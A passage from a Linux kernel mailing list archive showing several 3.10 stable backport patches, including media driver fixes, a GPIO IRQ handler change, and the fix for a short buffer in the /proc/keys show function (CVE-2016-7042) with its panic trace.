-	{ 0x28, 0x15 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xf3 },
-	{ 0x28, 0x16 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x05 },
-	{ 0x28, 0x17 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x16 },
-	{ 0x28, 0x18 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0f },
-	{ 0x28, 0x19 }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xef },
-	{ 0x28, 0x1a }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xd8 },
-	{ 0x28, 0x1b }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xf1 },
-	{ 0x28, 0x1c }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x3d },
-	{ 0x28, 0x1d }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x94 },
-	{ 0x28, 0x1e }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0xba },
+	{ 0x28, 0x06 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x03 },
+	{ 0x28, 0x07 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0d },
+	{ 0x28, 0x08 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x02 },
+	{ 0x28, 0x09 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x01 },
+	{ 0x28, 0x0a }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x21 },
+	{ 0x28, 0x0b }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x29 },
+	{ 0x28, 0x0c }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x16 },
+	{ 0x28, 0x0d }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x31 },
+	{ 0x28, 0x0e }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0e },
+	{ 0x28, 0x0f }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x4e },
+	{ 0x28, 0x10 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x46 },
+	{ 0x28, 0x11 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0f },
+	{ 0x28, 0x12 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x56 },
+	{ 0x28, 0x13 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x35 },
+	{ 0x28, 0x14 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xbe },
+	{ 0x28, 0x15 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0x84 },
+	{ 0x28, 0x16 }, { 0x29, 0x00 }, { 0x2a, 0x03 }, { 0x2b, 0xee },
+	{ 0x28, 0x17 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x98 },
+	{ 0x28, 0x18 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x9f },
+	{ 0x28, 0x19 }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xb2 },
+	{ 0x28, 0x1a }, { 0x29, 0x00 }, { 0x2a, 0x06 }, { 0x2b, 0xc2 },
+	{ 0x28, 0x1b }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0x4a },
+	{ 0x28, 0x1c }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xbc },
+	{ 0x28, 0x1d }, { 0x29, 0x00 }, { 0x2a, 0x04 }, { 0x2b, 0xba },
+	{ 0x28, 0x1e }, { 0x29, 0x00 }, { 0x2a, 0x06 }, { 0x2b, 0x14 },
 	{ 0x50, 0x1e }, { 0x51, 0x5d },
 	{ 0x50, 0x22 }, { 0x51, 0x00 },
 	{ 0x50, 0x23 }, { 0x51, 0xc8 },
@@ -200,9 +194,7 @@ static struct regdata mb86a20s_init2[] = {
 	{ 0x50, 0x26 }, { 0x51, 0x00 },
 	{ 0x50, 0x27 }, { 0x51, 0xc3 },
 	{ 0x50, 0x39 }, { 0x51, 0x02 },
-	{ 0xec, 0x0f },
-	{ 0xeb, 0x1f },
-	{ 0x28, 0x6a }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x00 },
+	{ 0x50, 0xd5 }, { 0x51, 0x01 },
 	{ 0xd0, 0x00 },
 };
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 298/319] cx231xx: don't return error on success
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (196 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 297/319] mb86a20s: fix demod settings Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 299/319] cx231xx: fix GPIOs for Pixelview SBTVD hybrid Willy Tarreau
                   ` (20 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Mauro Carvalho Chehab, Mauro Carvalho Chehab, Willy Tarreau

From: Mauro Carvalho Chehab <mchehab@osg.samsung.com>

commit 1871d718a9db649b70f0929d2778dc01bc49b286 upstream.

The cx231xx_set_agc_analog_digital_mux_select() callers
expect it to return 0 or an error. Returning a positive value
makes the first attempt to switch between analog/digital to fail.

Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/media/usb/cx231xx/cx231xx-avcore.c | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/media/usb/cx231xx/cx231xx-avcore.c b/drivers/media/usb/cx231xx/cx231xx-avcore.c
index 235ba65..79a24ef 100644
--- a/drivers/media/usb/cx231xx/cx231xx-avcore.c
+++ b/drivers/media/usb/cx231xx/cx231xx-avcore.c
@@ -1261,7 +1261,10 @@ int cx231xx_set_agc_analog_digital_mux_select(struct cx231xx *dev,
 				   dev->board.agc_analog_digital_select_gpio,
 				   analog_or_digital);
 
-	return status;
+	if (status < 0)
+		return status;
+
+	return 0;
 }
 
 int cx231xx_enable_i2c_port_3(struct cx231xx *dev, bool is_port_3)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 299/319] cx231xx: fix GPIOs for Pixelview SBTVD hybrid
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (197 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 298/319] cx231xx: don't return error on success Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 300/319] gpio: mpc8xxx: Correct irq handler function Willy Tarreau
                   ` (19 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Mauro Carvalho Chehab, Mauro Carvalho Chehab, Willy Tarreau

From: Mauro Carvalho Chehab <mchehab@osg.samsung.com>

commit 24b923f073ac37eb744f56a2c7f77107b8219ab2 upstream.

This device uses GPIOs: 28 to switch between analog and
digital modes: on digital mode, it should be set to 1.

The code that sets it on analog mode is OK, but it misses
the logic that sets it on digital mode.

Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/media/usb/cx231xx/cx231xx-cards.c | 2 +-
 drivers/media/usb/cx231xx/cx231xx-core.c  | 3 ++-
 2 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/drivers/media/usb/cx231xx/cx231xx-cards.c b/drivers/media/usb/cx231xx/cx231xx-cards.c
index 13249e5..c13c323 100644
--- a/drivers/media/usb/cx231xx/cx231xx-cards.c
+++ b/drivers/media/usb/cx231xx/cx231xx-cards.c
@@ -452,7 +452,7 @@ struct cx231xx_board cx231xx_boards[] = {
 		.output_mode = OUT_MODE_VIP11,
 		.demod_xfer_mode = 0,
 		.ctl_pin_status_mask = 0xFFFFFFC4,
-		.agc_analog_digital_select_gpio = 0x00,	/* According with PV cxPolaris.inf file */
+		.agc_analog_digital_select_gpio = 0x1c,
 		.tuner_sif_gpio = -1,
 		.tuner_scl_gpio = -1,
 		.tuner_sda_gpio = -1,
diff --git a/drivers/media/usb/cx231xx/cx231xx-core.c b/drivers/media/usb/cx231xx/cx231xx-core.c
index 4ba3ce0..6f5ffcc 100644
--- a/drivers/media/usb/cx231xx/cx231xx-core.c
+++ b/drivers/media/usb/cx231xx/cx231xx-core.c
@@ -723,6 +723,7 @@ int cx231xx_set_mode(struct cx231xx *dev, enum cx231xx_mode set_mode)
 			break;
 		case CX231XX_BOARD_CNXT_RDE_253S:
 		case CX231XX_BOARD_CNXT_RDU_253S:
+		case CX231XX_BOARD_PV_PLAYTV_USB_HYBRID:
 			errCode = cx231xx_set_agc_analog_digital_mux_select(dev, 1);
 			break;
 		case CX231XX_BOARD_HAUPPAUGE_EXETER:
@@ -747,7 +748,7 @@ int cx231xx_set_mode(struct cx231xx *dev, enum cx231xx_mode set_mode)
 		case CX231XX_BOARD_PV_PLAYTV_USB_HYBRID:
 		case CX231XX_BOARD_HAUPPAUGE_USB2_FM_PAL:
 		case CX231XX_BOARD_HAUPPAUGE_USB2_FM_NTSC:
-		errCode = cx231xx_set_agc_analog_digital_mux_select(dev, 0);
+			errCode = cx231xx_set_agc_analog_digital_mux_select(dev, 0);
 			break;
 		default:
 			break;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 300/319] gpio: mpc8xxx: Correct irq handler function
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (198 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 299/319] cx231xx: fix GPIOs for Pixelview SBTVD hybrid Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 301/319] uio: fix dmem_region_start computation Willy Tarreau
                   ` (18 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Liu Gang, Linus Walleij, Willy Tarreau

From: Liu Gang <Gang.Liu@nxp.com>

commit d71cf15b865bdd45925f7b094d169aaabd705145 upstream.

>From the beginning of the gpio-mpc8xxx.c, the "handle_level_irq"
has being used to handle GPIO interrupts in the PowerPC/Layerscape
platforms. But actually, almost all PowerPC/Layerscape platforms
assert an interrupt request upon either a high-to-low change or
any change on the state of the signal.

So the "handle_level_irq" is not reasonable for PowerPC/Layerscape
GPIO interrupt, it should be "handle_edge_irq". Otherwise the system
may lost some interrupts from the PIN's state changes.

Signed-off-by: Liu Gang <Gang.Liu@nxp.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/gpio/gpio-mpc8xxx.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/gpio/gpio-mpc8xxx.c b/drivers/gpio/gpio-mpc8xxx.c
index 2aa3ca2..d5376aa 100644
--- a/drivers/gpio/gpio-mpc8xxx.c
+++ b/drivers/gpio/gpio-mpc8xxx.c
@@ -295,7 +295,7 @@ static int mpc8xxx_gpio_irq_map(struct irq_domain *h, unsigned int virq,
 		mpc8xxx_irq_chip.irq_set_type = mpc8xxx_gc->of_dev_id_data;
 
 	irq_set_chip_data(virq, h->host_data);
-	irq_set_chip_and_handler(virq, &mpc8xxx_irq_chip, handle_level_irq);
+	irq_set_chip_and_handler(virq, &mpc8xxx_irq_chip, handle_edge_irq);
 
 	return 0;
 }
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 301/319] uio: fix dmem_region_start computation
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (199 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 300/319] gpio: mpc8xxx: Correct irq handler function Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 302/319] KEYS: Fix short sprintf buffer in /proc/keys show function Willy Tarreau
                   ` (17 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Jan Viktorin, Willy Tarreau

From: Jan Viktorin <viktorin@rehivetech.com>

commit 4d31a2588ae37a5d0f61f4d956454e9504846aeb upstream.

The variable i contains a total number of resources (including
IORESOURCE_IRQ). However, we want the dmem_region_start to point
after the last resource of type IORESOURCE_MEM. The original behaviour
leads (very likely) to skipping several UIO mapping regions and makes
them useless. Fix this by computing dmem_region_start from the uiomem
which points to the last used UIO mapping.

Fixes: 0a0c3b5a24bd ("Add new uio device for dynamic memory allocation")

Signed-off-by: Jan Viktorin <viktorin@rehivetech.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/uio/uio_dmem_genirq.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/uio/uio_dmem_genirq.c b/drivers/uio/uio_dmem_genirq.c
index 252434c..2290b1f 100644
--- a/drivers/uio/uio_dmem_genirq.c
+++ b/drivers/uio/uio_dmem_genirq.c
@@ -229,7 +229,7 @@ static int uio_dmem_genirq_probe(struct platform_device *pdev)
 		++uiomem;
 	}
 
-	priv->dmem_region_start = i;
+	priv->dmem_region_start = uiomem - &uioinfo->mem[0];
 	priv->num_dmem_regions = pdata->num_dynamic_regions;
 
 	for (i = 0; i < pdata->num_dynamic_regions; ++i) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 302/319] KEYS: Fix short sprintf buffer in /proc/keys show function
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (200 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 301/319] uio: fix dmem_region_start computation Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 303/319] hv: do not lose pending heartbeat vmbus packets Willy Tarreau
                   ` (16 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: David Howells, James Morris, Willy Tarreau

From: David Howells <dhowells@redhat.com>

commit 03dab869b7b239c4e013ec82aea22e181e441cfc upstream.

This fixes CVE-2016-7042.

Fix a short sprintf buffer in proc_keys_show().  If the gcc stack protector
is turned on, this can cause a panic due to stack corruption.

The problem is that xbuf[] is not big enough to hold a 64-bit timeout
rendered as weeks:

	(gdb) p 0xffffffffffffffffULL/(60*60*24*7)
	$2 = 30500568904943

That's 14 chars plus NUL, not 11 chars plus NUL.

Expand the buffer to 16 chars.

I think the unpatched code apparently works if the stack-protector is not
enabled because on a 32-bit machine the buffer won't be overflowed and on a
64-bit machine there's a 64-bit aligned pointer at one side and an int that
isn't checked again on the other side.

The panic incurred looks something like:

Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: ffffffff81352ebe
CPU: 0 PID: 1692 Comm: reproducer Not tainted 4.7.2-201.fc24.x86_64 #1
Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011
 0000000000000086 00000000fbbd2679 ffff8800a044bc00 ffffffff813d941f
 ffffffff81a28d58 ffff8800a044bc98 ffff8800a044bc88 ffffffff811b2cb6
 ffff880000000010 ffff8800a044bc98 ffff8800a044bc30 00000000fbbd2679
Call Trace:
 [<ffffffff813d941f>] dump_stack+0x63/0x84
 [<ffffffff811b2cb6>] panic+0xde/0x22a
 [<ffffffff81352ebe>] ? proc_keys_show+0x3ce/0x3d0
 [<ffffffff8109f7f9>] __stack_chk_fail+0x19/0x30
 [<ffffffff81352ebe>] proc_keys_show+0x3ce/0x3d0
 [<ffffffff81350410>] ? key_validate+0x50/0x50
 [<ffffffff8134db30>] ? key_default_cmp+0x20/0x20
 [<ffffffff8126b31c>] seq_read+0x2cc/0x390
 [<ffffffff812b6b12>] proc_reg_read+0x42/0x70
 [<ffffffff81244fc7>] __vfs_read+0x37/0x150
 [<ffffffff81357020>] ? security_file_permission+0xa0/0xc0
 [<ffffffff81246156>] vfs_read+0x96/0x130
 [<ffffffff81247635>] SyS_read+0x55/0xc0
 [<ffffffff817eb872>] entry_SYSCALL_64_fastpath+0x1a/0xa4

Reported-by: Ondrej Kozina <okozina@redhat.com>
Signed-off-by: David Howells <dhowells@redhat.com>
Tested-by: Ondrej Kozina <okozina@redhat.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 security/keys/proc.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/security/keys/proc.c b/security/keys/proc.c
index 217b685..374c330 100644
--- a/security/keys/proc.c
+++ b/security/keys/proc.c
@@ -188,7 +188,7 @@ static int proc_keys_show(struct seq_file *m, void *v)
 	struct timespec now;
 	unsigned long timo;
 	key_ref_t key_ref, skey_ref;
-	char xbuf[12];
+	char xbuf[16];
 	int rc;
 
 	key_ref = make_key_ref(key, 0);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 303/319] hv: do not lose pending heartbeat vmbus packets
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (201 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 302/319] KEYS: Fix short sprintf buffer in /proc/keys show function Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 304/319] staging: iio: ad5933: avoid uninitialized variable in error case Willy Tarreau
                   ` (15 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Long Li, K . Y . Srinivasan, Willy Tarreau

From: Long Li <longli@microsoft.com>

commit 407a3aee6ee2d2cb46d9ba3fc380bc29f35d020c upstream.

The host keeps sending heartbeat packets independent of the
guest responding to them.  Even though we respond to the heartbeat messages at
interrupt level, we can have situations where there maybe multiple heartbeat
messages pending that have not been responded to. For instance this occurs when the
VM is paused and the host continues to send the heartbeat messages.
Address this issue by draining and responding to all
the heartbeat messages that maybe pending.

Signed-off-by: Long Li <longli@microsoft.com>
Signed-off-by: K. Y. Srinivasan <kys@microsoft.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/hv/hv_util.c | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/drivers/hv/hv_util.c b/drivers/hv/hv_util.c
index 64c778f..5f69c83 100644
--- a/drivers/hv/hv_util.c
+++ b/drivers/hv/hv_util.c
@@ -244,10 +244,14 @@ static void heartbeat_onchannelcallback(void *context)
 	struct heartbeat_msg_data *heartbeat_msg;
 	u8 *hbeat_txf_buf = util_heartbeat.recv_buffer;
 
-	vmbus_recvpacket(channel, hbeat_txf_buf,
-			 PAGE_SIZE, &recvlen, &requestid);
+	while (1) {
+
+		vmbus_recvpacket(channel, hbeat_txf_buf,
+				 PAGE_SIZE, &recvlen, &requestid);
+
+		if (!recvlen)
+			break;
 
-	if (recvlen > 0) {
 		icmsghdrp = (struct icmsg_hdr *)&hbeat_txf_buf[
 				sizeof(struct vmbuspipe_hdr)];
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 304/319] staging: iio: ad5933: avoid uninitialized variable in error case
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (202 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 303/319] hv: do not lose pending heartbeat vmbus packets Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 305/319] mei: bus: fix received data size check in NFC fixup Willy Tarreau
                   ` (14 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Arnd Bergmann, Jonathan Cameron, Willy Tarreau

From: Arnd Bergmann <arnd@arndb.de>

commit 34eee70a7b82b09dbda4cb453e0e21d460dae226 upstream.

The ad5933_i2c_read function returns an error code to indicate
whether it could read data or not. However ad5933_work() ignores
this return code and just accesses the data unconditionally,
which gets detected by gcc as a possible bug:

drivers/staging/iio/impedance-analyzer/ad5933.c: In function 'ad5933_work':
drivers/staging/iio/impedance-analyzer/ad5933.c:649:16: warning: 'status' may be used uninitialized in this function [-Wmaybe-uninitialized]

This adds minimal error handling so we only evaluate the
data if it was correctly read.

Link: https://patchwork.kernel.org/patch/8110281/
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/staging/iio/impedance-analyzer/ad5933.c | 17 ++++++++++-------
 1 file changed, 10 insertions(+), 7 deletions(-)

diff --git a/drivers/staging/iio/impedance-analyzer/ad5933.c b/drivers/staging/iio/impedance-analyzer/ad5933.c
index bc23d66..1ff1735 100644
--- a/drivers/staging/iio/impedance-analyzer/ad5933.c
+++ b/drivers/staging/iio/impedance-analyzer/ad5933.c
@@ -646,6 +646,7 @@ static void ad5933_work(struct work_struct *work)
 	struct iio_dev *indio_dev = i2c_get_clientdata(st->client);
 	signed short buf[2];
 	unsigned char status;
+	int ret;
 
 	mutex_lock(&indio_dev->mlock);
 	if (st->state == AD5933_CTRL_INIT_START_FREQ) {
@@ -653,19 +654,22 @@ static void ad5933_work(struct work_struct *work)
 		ad5933_cmd(st, AD5933_CTRL_START_SWEEP);
 		st->state = AD5933_CTRL_START_SWEEP;
 		schedule_delayed_work(&st->work, st->poll_time_jiffies);
-		mutex_unlock(&indio_dev->mlock);
-		return;
+		goto out;
 	}
 
-	ad5933_i2c_read(st->client, AD5933_REG_STATUS, 1, &status);
+	ret = ad5933_i2c_read(st->client, AD5933_REG_STATUS, 1, &status);
+	if (ret)
+		goto out;
 
 	if (status & AD5933_STAT_DATA_VALID) {
 		int scan_count = bitmap_weight(indio_dev->active_scan_mask,
 					       indio_dev->masklength);
-		ad5933_i2c_read(st->client,
+		ret = ad5933_i2c_read(st->client,
 				test_bit(1, indio_dev->active_scan_mask) ?
 				AD5933_REG_REAL_DATA : AD5933_REG_IMAG_DATA,
 				scan_count * 2, (u8 *)buf);
+		if (ret)
+			goto out;
 
 		if (scan_count == 2) {
 			buf[0] = be16_to_cpu(buf[0]);
@@ -677,8 +681,7 @@ static void ad5933_work(struct work_struct *work)
 	} else {
 		/* no data available - try again later */
 		schedule_delayed_work(&st->work, st->poll_time_jiffies);
-		mutex_unlock(&indio_dev->mlock);
-		return;
+		goto out;
 	}
 
 	if (status & AD5933_STAT_SWEEP_DONE) {
@@ -690,7 +693,7 @@ static void ad5933_work(struct work_struct *work)
 		ad5933_cmd(st, AD5933_CTRL_INC_FREQ);
 		schedule_delayed_work(&st->work, st->poll_time_jiffies);
 	}
-
+out:
 	mutex_unlock(&indio_dev->mlock);
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 305/319] mei: bus: fix received data size check in NFC fixup
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (203 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 304/319] staging: iio: ad5933: avoid uninitialized variable in error case Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 306/319] ACPI / APEI: Fix incorrect return value of ghes_proc() Willy Tarreau
                   ` (13 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Alexander Usyskin, Tomas Winkler, Jiri Slaby, Willy Tarreau

From: Alexander Usyskin <alexander.usyskin@intel.com>

commit 582ab27a063a506ccb55fc48afcc325342a2deba upstream.

NFC version reply size checked against only header size, not against
full message size. That may lead potentially to uninitialized memory access
in version data.

That leads to warnings when version data is accessed:
drivers/misc/mei/bus-fixup.c: warning: '*((void *)&ver+11)' may be used uninitialized in this function [-Wuninitialized]:  => 212:2

Reported in
Build regressions/improvements in v4.9-rc3
https://lkml.org/lkml/2016/10/30/57

[js] the check is in 3.12 only once

Fixes: 59fcd7c63abf (mei: nfc: Initial nfc implementation)
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/misc/mei/nfc.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/misc/mei/nfc.c b/drivers/misc/mei/nfc.c
index 4b7ea3f..1f8f856 100644
--- a/drivers/misc/mei/nfc.c
+++ b/drivers/misc/mei/nfc.c
@@ -292,7 +292,7 @@ static int mei_nfc_if_version(struct mei_nfc_dev *ndev)
 		return -ENOMEM;
 
 	bytes_recv = __mei_cl_recv(cl, (u8 *)reply, if_version_length);
-	if (bytes_recv < 0 || bytes_recv < sizeof(struct mei_nfc_reply)) {
+	if (bytes_recv < if_version_length) {
 		dev_err(&dev->pdev->dev, "Could not read IF version\n");
 		ret = -EIO;
 		goto err;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 306/319] ACPI / APEI: Fix incorrect return value of ghes_proc()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (204 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 305/319] mei: bus: fix received data size check in NFC fixup Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 307/319] PCI: Handle read-only BARs on AMD CS553x devices Willy Tarreau
                   ` (12 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Punit Agrawal, Rafael J . Wysocki, Willy Tarreau

From: Punit Agrawal <punit.agrawal@arm.com>

commit 806487a8fc8f385af75ed261e9ab658fc845e633 upstream.

Although ghes_proc() tests for errors while reading the error status,
it always return success (0). Fix this by propagating the return
value.

Fixes: d334a49113a4a33 (ACPI, APEI, Generic Hardware Error Source memory error support)
Signed-of-by: Punit Agrawal <punit.agrawa.@arm.com>
Tested-by: Tyler Baicar <tbaicar@codeaurora.org>
Reviewed-by: Borislav Petkov <bp@suse.de>
[ rjw: Subject ]
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/acpi/apei/ghes.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/acpi/apei/ghes.c b/drivers/acpi/apei/ghes.c
index fcd7d91..070b843 100644
--- a/drivers/acpi/apei/ghes.c
+++ b/drivers/acpi/apei/ghes.c
@@ -647,7 +647,7 @@ static int ghes_proc(struct ghes *ghes)
 	ghes_do_proc(ghes, ghes->estatus);
 out:
 	ghes_clear_estatus(ghes);
-	return 0;
+	return rc;
 }
 
 static void ghes_add_timer(struct ghes *ghes)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 307/319] PCI: Handle read-only BARs on AMD CS553x devices
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (205 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 306/319] ACPI / APEI: Fix incorrect return value of ghes_proc() Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 308/319] tile: avoid using clocksource_cyc2ns with absolute cycle count Willy Tarreau
                   ` (11 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Myron Stowe, Bjorn Helgaas, Jiri Slaby, Willy Tarreau

From: Myron Stowe <myron.stowe@redhat.com>

commit 06cf35f903aa6da0cc8d9f81e9bcd1f7e1b534bb upstream.

Some AMD CS553x devices have read-only BARs because of a firmware or
